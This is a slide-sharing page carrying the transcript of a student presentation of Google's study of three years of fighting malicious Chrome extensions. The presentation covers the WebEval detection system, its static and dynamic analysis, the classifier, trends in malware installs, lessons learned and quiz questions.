Trends and Lessons from Three Years Fighting Malicious Extensions Nav Jagpal, Eric Dingle, Jean-Philippe, Gravel Panayiotis, Mavrommatis Niels, Provos.

Slides:

Advertisements

Similar presentations

LeadManager™- Internet Marketing Lead Management Solution May, 2009.

Advertisements

Next Generation Endpoint Security Jason Brown Enterprise Solution Architect McAfee May 23, 2013.

Chrome Extentions Vulnerabilities. Introduction Google Chrome Browser Chrome OS Platform Chrome Web Store Applications Open Source Platform.

Hulk: Eliciting Malicious Behavior in Browser Extensions

By Hiranmayi Pai Neeraj Jain

1 Chapter 8 Fundamentals of System Security. 2 Objectives In this chapter, you will: Understand the trade-offs among security, performance, and ease of.

Telnet and FTP. Telnet Lets you use the resources of some other computer on the Internet to access files, run programs, etc. Creates interactive connection.

Secure web browsers, malicious hardware, and hardware support for binary translation Sam King.

Design and Evaluation of a Real- Time URL Spam Filtering Service Kurt Thomas, Chris Grier, Justin Ma, Vern Paxson, Dawn Song University of California,

The Most Dangerous Code in the Browser Stefan Heule, Devon Rifkin, Alejandro Russo, Deian Stefan Stanford University, Chalmers University of Technology.

The OWASP Foundation Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under.

IBM Security Network Protection (XGS)

Brian Bradley.  Data is any type of stored digital information.  Security is about the protection of assets.  Prevention: measures taken to protect.

1 Panda Malware Radar Discovering hidden threats Technical Product Presentation Name Date.

Trend Micro Deployment Kelvin Hwang IT Services University of Windsor.

Norman SecureTide Powerful cloud solution to stop spam and threats before it reaches your network.

2851A_C01. Microsoft Windows XP Service Pack 2 Security Technologies Bruce Cowper IT Pro Advisor Microsoft Canada.

PROJECT IN COMPUTER SECURITY MONITORING BOTNETS FROM WITHIN FINAL PRESENTATION – SPRING 2012 Students: Shir Degani, Yuval Degani Supervisor: Amichai Shulman.

Efficient Privilege De-Escalation for Ad Libraries in Mobile Apps Bin Liu (SRA), Bin Liu (CMU), Hongxia Jin (SRA), Ramesh Govindan (USC)

With Internet Explorer 9 Getting Started© 2013 Pearson Education, Inc. Publishing as Prentice Hall1 Exploring the World Wide Web with Internet Explorer.

Air Force Association (AFA) 1. 1.Access Control 2.Four Steps to Access 3.How Does it Work? 4.User and Guest Accounts 5.Administrator Accounts 6.Threat.

First Community Bank Prevx Safe Online Rollout & Best Practice Presentation.

Presentation by Kathleen Stoeckle All Your iFRAMEs Point to Us 17th USENIX Security Symposium (Security'08), San Jose, CA, 2008 Google Technical Report.

Securing Windows 7 Lesson 10. Objectives Understand authentication and authorization Configure password policies Secure Windows 7 using the Action Center.

B OTNETS T HREATS A ND B OTNETS DETECTION Mona Aldakheel

Prepared By, Mahadir Ahmad. StopBadware makes the Web safer through the prevention, mitigation, and remediation of badware websites. partners include.

Niels Provos and Panayiotis Mavrommatis Google Google Inc. Moheeb Abu Rajab and Fabian Monrose Johns Hopkins University 17 th USENIX Security Symposium.

A Framework for Automated Web Application Security Evaluation

1 All Your iFRAMEs Point to Us Mike Burry. 2 Drive-by downloads Malicious code (typically Javascript) Downloaded without user interaction (automatic),

Web Browser Security Prepared By Mohammed EL-Batta Mohammed Soubih Supervised By Eng. Eman alajrami Explain Date 10. may University of Palestine.

Virtual techdays INDIA │ 9-11 February 2011 Security Discussion: Ask the Experts M.S.Anand │ MTC Technology Specialist │ Microsoft Corporation Anirudh.

Behavior-based Spyware Detection By Engin Kirda and Christopher Kruegel Secure Systems Lab Technical University Vienna Greg Banks, Giovanni Vigna, and.

®® Microsoft Windows 7 Windows Tutorial 5 Protecting Your Computer.

 a crime committed on a computer network, esp. the Internet.

CSE 4481 Computer Security Lab Mark Shtern. INTRODUCTION.

A Crawler-based Study of Spyware on the Web Authors: Alexander Moshchuk, Tanya Bragin, Steven D.Gribble, and Henry M. Levy University of Washington 13.

BLENDED ATTACKS EXPLOITS, VULNERABILITIES AND BUFFER-OVERFLOW TECHNIQUES IN COMPUTER VIRUSES By: Eric Chien and Peter Szor Presented by: Jesus Morales.

3-Protecting Systems Dr. John P. Abraham Professor UTPA.

Gaurav Aggarwal and Elie Bursztein, Collin Jackson, Dan Boneh, USENIX (Aug.,2010) A N A NALYSIS OF P RIVATE B ROWSING M ODES IN M ODERN B ROWSERS 1.

CSC-682 Cryptography & Computer Security Sound and Precise Analysis of Web Applications for Injection Vulnerabilities Pompi Rotaru Based on an article.

HIPS Host-Based Intrusion Prevention System By Ali Adlavaran & Mahdi Mohamad Pour (M.A. Team) Life’s Live in Code Life.

Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.

CSE 4481 Computer Security Lab Mark Shtern. INTRODUCTION.

MICHALIS POLYCHRONAKIS(COLUMBIA UNIVERSITY,USA), KOSTAS G. ANAGNOSTAKIS(NIOMETRICS, SINGAPORE), EVANGELOS P. MARKATOS(FORTH-ICS, GREECE) ACSAC,2010 Comprehensive.

Leveraging Asset Reputation Systems to Detect and Prevent Fraud and Abuse at LinkedIn Jenelle Bray Staff Data Scientist Strata + Hadoop World New York,

Automated Web Patrol with Strider HoneyMonkeys: Finding Web Sites That Exploit Browser Vulnerabilities Yi-Min Wang, Doug Beck, Xuxian Jiang, Roussi Roussev,

Trends in Circumventing Web-Malware Detection UTSA Moheeb Abu Rajab, Lucas Ballard, Nav Jagpal, Panayiotis Mavrommatis, Daisuke Nojiri, Niels Provos, Ludwig.

Security Analytics Thrust Anthony D. Joseph (UCB) Rachel Greenstadt (Drexel), Ling Huang (Intel), Dawn Song (UCB), Doug Tygar (UCB)

Protecting Browsers from Extension Vulnerabilities Paper by: Adam Barth, Adrienne Porter Felt, Prateek Saxena at University of California, Berkeley and.

Sky Advanced Threat Prevention

Module 12: Responding to Security Incidents. Overview Introduction to Auditing and Incident Response Designing an Audit Policy Designing an Incident Response.

IT Computer Security JEOPARDY RouterModesWANEncapsulationWANServicesRouterBasicsRouterCommands RouterModesWANEncapsulationWANServicesRouterBasicsRouterCommands.

1 Isolating Web Programs in Modern Browser Architectures CS6204: Cloud Environment Spring 2011.

Introduction Program File Authorization Security Theorem Active Code Authorization Authorization Logic Implementation considerations Conclusion.

Identifying “Best Bet” Web Search Results by Mining Past User Behavior Author: Eugene Agichtein, Zijian Zheng (Microsoft Research) Source: KDD2006 Reporter:

Mark Shtern.  Our life depends on computer systems  Traffic control  Banking  Medical equipment  Internet  Social networks  Growing number of.

Return to the PC Security web page Lesson 4: Increasing Web Browser Security.

Antivirus Software Troy Behmer. Outline Topics covered: – What is Antivirus software (AVS)? – What are the advantages and disadvantages of AVS? – What.

Microsoft NDA Material Adwait Joshi Sr. Technical Product Manager Microsoft Corporation.

Securing a Host Computer BY STEPHEN GOSNER. Definition of a Host  Host  In networking, a host is any device that has an IP address.  Hosts include.

Unit 2 Personal Cyber Security and Social Engineering Part 2.

Unveiling Zeus Automated Classification of Malware Samples Abedelaziz Mohaisen Omar Alrawi Verisign Inc, VA, USA Verisign Labs, VA, USA

Powerpoint presentation on Drive-by download attack -By Yogita Goyal.

Title Line Subtitle Line Top of Content Box Line Top of Footer Line Left Margin LineRight Margin Line Top of Footer Line Top of Content Box Line Subtitle.

What mobile ads know about mobile users

Web Application Vulnerabilities, Detection Mechanisms, and Defenses

Prof. Dr. Marc Rennhard Head of Information Security Research Group

Malware Reverse Engineering Process

BotCatch: A Behavior and Signature Correlated Bot Detection Approach

TriggerScope Towards detecting logic bombs in android applications

Presentation transcript:

Trends and Lessons from Three Years Fighting Malicious Extensions Nav Jagpal, Eric Dingle, Jean-Philippe, Gravel Panayiotis, Mavrommatis Niels, Provos Moheeb, Abu Rajab, Kurt Thomas Google Presenter: Haonan

Motivation Browsers extensions: Add-ons that allow clients to customize their browsing experience by altering the core functionality. Search toolbars, password managers, ad blockers

Malicious Extentions man-in-the-browser attacks: Facebook account hijackers, ad injectors, and password stealers.

Malicious Extentions Binary-based: Torpig banking trojan, ZeroAccess bot.

Related Works Security Sandboxes & Malware Detection Chrome extensions run in the context of a webpage Hard for system-wide malware monitoring techniques to isolate malware activity from that of the browser.

WebEval WebEval is designed to return a verdict for whether an extension is malicious. If the extension is pending publication, the ChromeWeb Store should block the extension from release. Previously published extensions must be taken down and uninstalled from all affected Chrome instances.

Design Goals 1. Minimize malware installs. 2. Simplify human verification. 3. Time-constrained. 4. Comprehensible, historical reports. 5. Tolerant to feature drift.

System Flow

Evaluating Extensions Static Analysis Permissions & Content Scripts Code Obfuscation Files and Directory Structure Developer Analysis

Evaluating Extensions Dynamic Analysis Outputs: 1.network requests 2.DOM operations 3.Chrome API calls Sandbox Environment Behavioral Suites Generic Suites Malicious Logic Suites

Annotation Scan all of the files. Scan outgoing network requests. Evaluate an extension in the context of all previously scanned extensions. Cluster the extensions based on the referrer of all incoming install requests.

Scoring Extensions Automated Detection They train a model daily over all previously scanned extensions with labeled training data originating from human experts. Any input to the classifier should have a direct translation to an activity that analysts can recognize. An online gradient descent logistic regression with L1 regularization to reduce the size of feature space.

Scoring Extensions Manual Rules Facebook Hijacking Search Leakage User Tracking

Evaluation Monthly: Weekly:

Evaluation Top 10 permissions requested in extension manifest.

Evaluation Top 10 Chrome API calls performed during dynamic execution.

Evaluation Top 10 DOM operations performed during dynamic execution.

Evaluation Precision and recall of individual behavioral signatures.

Evaluation CDF of the delay before catching a malicious extension after it is first submitted to the Chrome Web Store

Evaluation Actions taken against malicious extensions in the Chrome Web Store over time.

Trends in Malicious Extensions Malware varietals detected each month from 2012– 2015.

Trends in Malicious Extensions CDF of installs broken down

Trends in Malicious Extensions Malware installations via the Chrome Web Store for the past three years broken down.

Trends in Malicious Extensions Registration time of malware authors.

Trends in Malicious Extensions Top 10 regions impacted by malicious extensions downloaded via the Chrome Web Store.

Trends in Malicious Extensions Top 10 login geolocations of malicious developers.

Lessons Learned The abusive extension ecosystem is drastically different from malicious binaries. The importance of equipping an abuse prevention team with the tools necessary to rapidly respond to new, unforeseen threats.

Limitations Dynamic analysis and security crawlers consistently run the risk of overlooking malicious behaviors due to cloaking. The behavioral suites are not guaranteed to trigger all of an extension’s logic during evaluation.

Conclusion They present a comprehensive view of how malicious extensions in the Chrome Web Store have evolved and monetized victims over the last three years. They detail the design and implementation of our security framework that combines dynamic analysis, static analysis, and reputation tracking to detect 96.5% of all known malicious extensions. They highlight the importance of human experts in operating any large-scale, live deployment of a security scanner to address evasive malware strains. They explore the virulent impact of malicious extensions that garner over 50 million installs; the single largest threat infecting 10.7 million Chrome users.

Opinion Human intervention Policies

Quiz 1.Why aren’t traditional malware monitoring techniques effective against malicious extensions? 2.What’s the principle of choosing features for the classifier? 3.Why are human experts needed for their approach?

Thank you!